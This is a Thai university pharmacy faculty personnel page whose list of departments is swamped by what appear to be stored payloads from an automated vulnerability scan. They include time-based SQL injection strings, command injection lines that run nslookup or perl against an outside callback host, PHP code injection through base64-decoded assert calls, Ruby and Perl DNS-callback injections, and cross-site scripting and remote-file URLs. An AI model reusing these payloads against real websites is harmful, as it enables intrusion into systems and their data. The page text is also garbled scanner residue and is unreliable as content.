ข่าวประชาสัมพันธ์

บุคลากรคณะเภสัชศาสตร์

- sOdPqaAH

- กลุ่มวิชาเภสัชกรรมเทคโนโลยีและเภสัชอุตสาหกรรม

- กลุ่มวิชาเภสัชกรรมสังคมและการบริหาร

- กลุ่มวิชาเภสัชเคมีและเภสัชเวท

- กลุ่มวิชาเภสัชวิทยาและการบริบาลทางเภสัชกรรม

- สำนักงานเลขานุการและบุคลากรสายสนับสนุน

- "+"A".concat(70-3).concat(22*4).concat(120).concat(72).concat(102).concat(81)+(require"socket" Socket.gethostbyname("hitic"+"bpgmknty5b4a0.bxss.me.")[3].to_s)+"

- ${@print(md5(31337))}\

- sOdPqaAH

- sOdPqaAH

- sOdPqaAH

- '+'A'.concat(70-3).concat(22*4).concat(100).concat(81).concat(115).concat(89)+(require'socket' Socket.gethostbyname('hitnw'+'pdxsougbd1705.bxss.me.')[3].to_s)+'

- '.print(md5(31337)).'

- HttP://bxss.me/t/xss.html?%00

- sOdPqaAH'"()&%

- sOdPqaAH

- bxss.me/t/xss.html?%00

- '"()&%

- sOdPqaAH9853519

- sOdPqaAH

- sOdPqaAH

- sOdPqaAH

- sOdPqaAH

- sOdPqaAH

- sOdPqaAH

- sOdPqaAH

- u4l3GBse

- -1 OR 2+86-86-1=0+0+0+1 --

- -1 OR 2+820-820-1=0+0+0+1

- -1' OR 2+337-337-1=0+0+0+1 --

- -1' OR 2+240-240-1=0+0+0+1 or 'Oi0Rv6so'='

- -1" OR 2+128-128-1=0+0+0+1 --

- if(now()=sysdate(),sleep(15),0)

- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

- 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

- (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

- 1 waitfor delay '0:0:15' --

- qTb4v4BT'; waitfor delay '0:0:15' --

- A6iDH4nm' OR 912=(SELECT 912 FROM PG_SLEEP(15))--

- 3QRfeTwx') OR 833=(SELECT 833 FROM PG_SLEEP(15))--

- ZPyX5s8D')) OR 809=(SELECT 809 FROM PG_SLEEP(15))--

- sOdPqaAH'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

- 1'"

- @@N1V4p

- sOdPqaAH

- sOdPqaAH

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- response.write(9889479*9774377)

- '+response.write(9889479*9774377)+'

- "+response.write(9889479*9774377)+"

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

-

- echo ytybez$()\ whvgud\nz^xyu||a #' &echo ytybez$()\ whvgud\nz^xyu||a #|" &echo ytybez$()\ whvgud\nz^xyu||a #

- &echo iytvyt$()\ vizuwj\nz^xyu||a #' &echo iytvyt$()\ vizuwj\nz^xyu||a #|" &echo iytvyt$()\ vizuwj\nz^xyu||a #

- |echo zyaczt$()\ crrzax\nz^xyu||a #' |echo zyaczt$()\ crrzax\nz^xyu||a #|" |echo zyaczt$()\ crrzax\nz^xyu||a #

- (nslookup hitczbdumowfo994ce.bxss.me||perl -e "gethostbyname('hitczbdumowfo994ce.bxss.me')")

- $(nslookup hitnlgnyxuakx18304.bxss.me||perl -e "gethostbyname('hitnlgnyxuakx18304.bxss.me')")

- ncMUFCMU

- ${9999726+10000051}

- &(nslookup hitwbyvdocmgaca678.bxss.me||perl -e "gethostbyname('hitwbyvdocmgaca678.bxss.me')")&'\"`0&(nslookup hitwbyvdocmgaca678.bxss.me||perl -e "gethostbyname('hitwbyvdocmgaca678.bxss.me')")&`'

- |(nslookup hitiztxxlgjvc9c60b.bxss.me||perl -e "gethostbyname('hitiztxxlgjvc9c60b.bxss.me')")

- `(nslookup hitinhuxfhmxn9b145.bxss.me||perl -e "gethostbyname('hitinhuxfhmxn9b145.bxss.me')")`

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

- ncMUFCMU

- http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

- ncMUFCMU

- http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

- ncMUFCMU

- 1some_inexistent_file_with_long_name.jpg

- ncMUFCMU

- Http://bxss.me/t/fit.txt

- ncMUFCMU

- ncMUFCMU

- http://bxss.me/t/fit.txt?.jpg

- ncMUFCMU

- ncMUFCMU

- bxss.me

- ncMUFCMU

- )

- !(()&&!|*|*|

- ncMUFCMU

- ^(#$!@#$)(()))******

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- '.gethostbyname(lc('hitzv'.'zfgwntoe6f63b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(83).chr(106).chr(83).'

- ncMUFCMU

- ncMUFCMU

- ".gethostbyname(lc("hitpf"."pcmcqycge6dd3.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(83).chr(111).chr(65)."

- ncMUFCMU

- add_personnel.php

- ncMUFCMU

- ncMUFCMU

- add_personnel.php

- ncMUFCMU

- add_personnel.php/.

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

- ';print(md5(31337));$a='

- ";print(md5(31337));$a="

- ${@print(md5(31337))}

- ${@print(md5(31337))}\

- '.print(md5(31337)).'

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- ncMUFCMU

- hQbomCu6

- -1 OR 2+123-123-1=0+0+0+1 --

- -1 OR 2+299-299-1=0+0+0+1

- -1' OR 2+96-96-1=0+0+0+1 --

- -1' OR 2+843-843-1=0+0+0+1 or 'RP10HfpS'='

- -1" OR 2+454-454-1=0+0+0+1 --

- if(now()=sysdate(),sleep(15),0)

- 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

- 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

- (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

- 1 waitfor delay '0:0:15' --

- OBtgLyZG'; waitfor delay '0:0:15' --

- jopaTd2k' OR 670=(SELECT 670 FROM PG_SLEEP(15))--

- dXzuG9IZ') OR 960=(SELECT 960 FROM PG_SLEEP(15))--

- A427G5s3')) OR 391=(SELECT 391 FROM PG_SLEEP(15))--

- ncMUFCMU'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

- 1'"

- @@S8ngS

- ncMUFCMU

- ncMUFCMU

Media

pharmacy.hcu.ac.th © Copyright 2016, All Rights Reserved Designed & developed by: Noppol Saechua